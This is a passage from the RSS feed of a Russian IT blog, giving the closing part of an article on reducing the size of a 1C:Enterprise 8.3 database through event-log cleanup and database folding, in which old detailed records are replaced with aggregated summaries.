<p><a href="https://litl-admin.ru/wp-content/uploads/2022/06/4.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7335" src="https://litl-admin.ru/wp-content/uploads/2022/06/4-620x394.png" alt="" width="620" height="394" srcset="https://litl-admin.ru/wp-content/uploads/2022/06/4-620x394.png 620w, https://litl-admin.ru/wp-content/uploads/2022/06/4-768x488.png 768w, https://litl-admin.ru/wp-content/uploads/2022/06/4.png 840w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="394"></span></a></p>
<p>И эта процедура сильно помочь, особенно если Вы работаете с файловой базой данных 1С (в версии SQL файлы журнала регистрации отдельно от базы данных).</p>
<h2>Свертка базы данных</h2>
<p>Эта процедура заключается в следующем: зачем хранить данные о хозяйственных операциях за прошлые периоды, если к ним никогда никто не обращается. Например, зачем нам смотреть что было 5 лет назад, если нужен по сути только этот год и предыдущий. Можно просто сделать копию базы, на случай необходимости, а в рабочей базе все удалить. И не просто все удалить, а подготовить срезы данных, чтобы с ними тоже можно было работать, но без глубокой детализации. Например, взять все движения денежных средств за месяц и просуммировать по каждому контрагенту. Это гораздо экономичнее, чем хранить данные по движению за каждый день. А ведь в день их может быть тоже несколько десятков.<br />
Конечно, такая процедура требует серьёзной подготовки, выполняется она не быстро и требует высококлассных опытных специалистов.</p>
<p>Конечно, это далеко не все рекомендации, которые можно выполнить. Есть ещё несколько интересных секретов, но они не всегда помогают, все зависит от конкретной ситуации. Но начать можно как раз с того, что мы описали в этой статье!</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/1s/kak-umenshit-razmer-bazy-dannyx-1s-8-3.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
	</channel>
</rss>